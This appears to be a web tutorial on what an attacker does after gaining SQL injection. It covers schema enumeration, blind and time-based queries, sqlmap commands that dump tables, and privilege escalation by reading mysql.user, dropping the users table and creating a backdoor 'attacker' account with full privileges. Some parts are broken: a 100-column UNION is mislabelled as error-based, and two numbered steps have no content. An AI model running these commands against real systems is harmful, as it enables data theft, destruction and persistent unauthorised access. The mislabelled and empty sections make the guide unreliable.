Database Enumeration
After initial exploitation via SQL injection, the next phase involves systematically extracting database schema details, credentials, and escalating privileges to gain deeper access. This process requires understanding the database structure, identifying misconfigurations, and leveraging user permissions to pivot to higher-privilege contexts.
Database Enumeration Techniques¶
Enumerating a database involves retrieving schema details (tables, columns, data types) and identifying potential credentials. Common methods include:
1. Basic Schema Enumeration¶
Use UNION SELECT to extract database metadata. For example:
SELECT CONCAT(TABLE_NAME, '(', COLUMN_NAME, ')') FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = DATABASE();
Example:
-- Retrieve database name
SELECT DATABASE();
-- Enumerate tables
SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = DATABASE();
-- Enumerate columns
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users';
2. Error-Based and Blind Enumeration¶
In error-based scenarios, trigger syntax errors to infer database structure:
SELECT 1 FROM users WHERE 1 = 1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100 FROM dual;
-- Time-based delay (MySQL)
SELECT IF((SELECT COUNT(*) FROM users WHERE username = 'admin'), SLEEP(5), 0);
3. Automated Tools¶
Tools like sqlmap can automate enumeration:
sqlmap -u "http://example.com/vulnerable.php?id=1" --tables
sqlmap -u "http://example.com/vulnerable.php?id=1" --columns
sqlmap -u "http://example.com/vulnerable.php?id=1" --dump
Privilege Escalation Strategies¶
Escalating privileges involves exploiting misconfigurations or leveraging user permissions to access administrative functions.
1. Identify Administrative Privileges¶
Check if the application user has access to system tables or administrative commands:
-- Check for administrative privileges (MySQL)
SELECT USER(), CURRENT_USER();
-- Check for elevated permissions
SELECT * FROM mysql.user WHERE User = 'root';
2. Exploit Database Misconfigurations¶
If the database allows remote connections, attempt to access it directly:
3. Leverage Application Permissions¶
If the application user has DROP, CREATE, or ALTER privileges, use them to modify the database:
-- Drop a table (if permitted)
DROP TABLE users;
-- Create a new user (MySQL)
CREATE USER 'attacker'@'%' IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON *.* TO 'attacker'@'%';
4. Exploit Stored Procedures or Functions¶
If the database contains malicious stored procedures, execute them to escalate privileges:
Tools and Automation¶
- sqlmap: Automates enumeration, privilege escalation, and data extraction.
- Burp Suite: Intercept and modify requests to test blind SQLi vectors.
- MySQL/PostgreSQL Clients: Directly access databases if credentials are exposed.
Key takeaways¶
- Use
UNION SELECTandINFORMATION_SCHEMAto extract database schemas. - Leverage error-based or blind techniques to infer schema details when responses are limited.
- Automate enumeration with tools like sqlmap to accelerate the process.
- Escalate privileges by exploiting misconfigurations, administrative commands, or stored procedures.
- Always validate database dialects (MySQL, PostgreSQL, SQL Server) for syntax compatibility.